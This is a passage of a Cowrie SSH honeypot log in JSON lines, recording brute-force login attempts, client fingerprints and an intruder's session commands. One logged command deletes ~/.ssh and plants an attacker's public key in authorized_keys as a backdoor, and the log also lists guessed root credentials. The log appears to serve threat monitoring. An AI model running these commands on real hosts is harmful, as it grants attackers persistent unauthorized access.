ha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:36:40.635678Z","src_ip":"102.88.137.80","session":"a4717d3cbd9d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:36:41.169025Z","src_ip":"102.88.137.80","session":"a4717d3cbd9d"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:41.293038Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:41.293911Z","src_ip":"102.88.137.80","session":"a4717d3cbd9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34984,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5b21378283c","protocol":"ssh","message":"New connection: 212.227.235.229:34984 (1.2.3.4:22) [session: c5b21378283c]","sensor":"my-vps","timestamp":"2025-08-31T01:36:45.891415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:36:46.632172Z","src_ip":"212.227.235.229","session":"c5b21378283c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:36:46.633080Z","src_ip":"212.227.235.229","session":"c5b21378283c"}
{"eventid":"cowrie.login.failed","username":"docker","password":"123456","message":"login attempt [docker/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:36:53.383864Z","src_ip":"212.227.235.229","session":"c5b21378283c"}
{"eventid":"cowrie.session.closed","duration":"9.8","message":"Connection lost after 9.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:55.690469Z","src_ip":"212.227.235.229","session":"c5b21378283c"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":60636,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc11a54226d7","protocol":"ssh","message":"New connection: 82.67.125.95:60636 (1.2.3.4:22) [session: bc11a54226d7]","sensor":"my-vps","timestamp":"2025-08-31T01:36:58.484269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:36:58.485665Z","src_ip":"82.67.125.95","session":"bc11a54226d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:36:58.521668Z","src_ip":"82.67.125.95","session":"bc11a54226d7"}
{"eventid":"cowrie.login.failed","username":"nftp","password":"nftp","message":"login attempt [nftp/nftp] failed","sensor":"my-vps","timestamp":"2025-08-31T01:36:58.706910Z","src_ip":"82.67.125.95","session":"bc11a54226d7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:59.746006Z","src_ip":"82.67.125.95","session":"bc11a54226d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53650,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba24704114b3","protocol":"ssh","message":"New connection: 212.227.125.160:53650 (1.2.3.4:22) [session: ba24704114b3]","sensor":"my-vps","timestamp":"2025-08-31T01:37:07.688177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:37:08.191331Z","src_ip":"212.227.125.160","session":"ba24704114b3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:37:08.192303Z","src_ip":"212.227.125.160","session":"ba24704114b3"}
{"eventid":"cowrie.login.failed","username":"docker","password":"123456","message":"login attempt [docker/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:37:10.357329Z","src_ip":"212.227.125.160","session":"ba24704114b3"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:11.843511Z","src_ip":"212.227.125.160","session":"ba24704114b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44946,"dst_ip":"1.2.3.4","dst_port":22,"session":"729872bd0dcb","protocol":"ssh","message":"New connection: 212.227.235.229:44946 (1.2.3.4:22) [session: 729872bd0dcb]","sensor":"my-vps","timestamp":"2025-08-31T01:37:47.185699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:37:48.275519Z","src_ip":"212.227.235.229","session":"729872bd0dcb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:37:48.276313Z","src_ip":"212.227.235.229","session":"729872bd0dcb"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49840,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb4aa163802e","protocol":"ssh","message":"New connection: 102.88.137.80:49840 (1.2.3.4:22) [session: bb4aa163802e]","sensor":"my-vps","timestamp":"2025-08-31T01:37:48.710563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:37:48.711631Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:37:48.834960Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.login.success","username":"root","password":"ronaldo2","message":"login attempt [root/ronaldo2] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:37:49.368267Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:37:49.634433Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:37:49.635213Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:37:49.636034Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:49.759921Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:37:50.065915Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:37:50.066599Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:37:50.193092Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:50.193948Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":17580,"dst_ip":"1.2.3.4","dst_port":22,"session":"d978aa98a670","protocol":"ssh","message":"New connection: 102.88.137.80:17580 (1.2.3.4:22) [session: d978aa98a670]","sensor":"my-vps","timestamp":"2025-08-31T01:37:50.329133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:37:50.330060Z","src_ip":"102.88.137.80","session":"d978aa98a670"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:37:50.459462Z","src_ip":"102.88.137.80","session":"d978aa98a670"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:37:51.020441Z","src_ip":"102.88.137.80","session":"d978aa98a670"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:52.153666Z","src_ip":"102.88.137.80","session":"d978aa98a670"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49841,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a31ac252503","protocol":"ssh","message":"New connection: 102.88.137.80:49841 (1.2.3.4:22) [session: 8a31ac252503]","sensor":"my-vps","timestamp":"2025-08-31T01:37:52.282165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:37:52.283032Z","src_ip":"102.88.137.80","session":"8a31ac252503"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:37:52.414159Z","src_ip":"102.88.137.80","session":"8a31ac252503"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:37:52.972671Z","src_ip":"102.88.137.80","session":"8a31ac252503"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:53.096563Z","src_ip":"102.88.137.80","session":"bb4aa163802e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:53.103164Z","src_ip":"102.88.137.80","session":"8a31ac252503"}
{"eventid":"cowrie.login.failed","username":"docker","password":"12345","message":"login attempt [docker/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T01:37:54.426305Z","src_ip":"212.227.235.229","session":"729872bd0dcb"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":35064,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea3db7070f9a","protocol":"ssh","message":"New connection: 82.67.125.95:35064 (1.2.3.4:22) [session: ea3db7070f9a]","sensor":"my-vps","timestamp":"2025-08-31T01:37:56.075544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:37:56.076206Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:37:56.112301Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd1!","message":"login attempt [root/P@ssw0rd1!] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:37:56.297602Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:56.348001Z","src_ip":"212.227.235.229","session":"729872bd0dcb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:37:56.389140Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
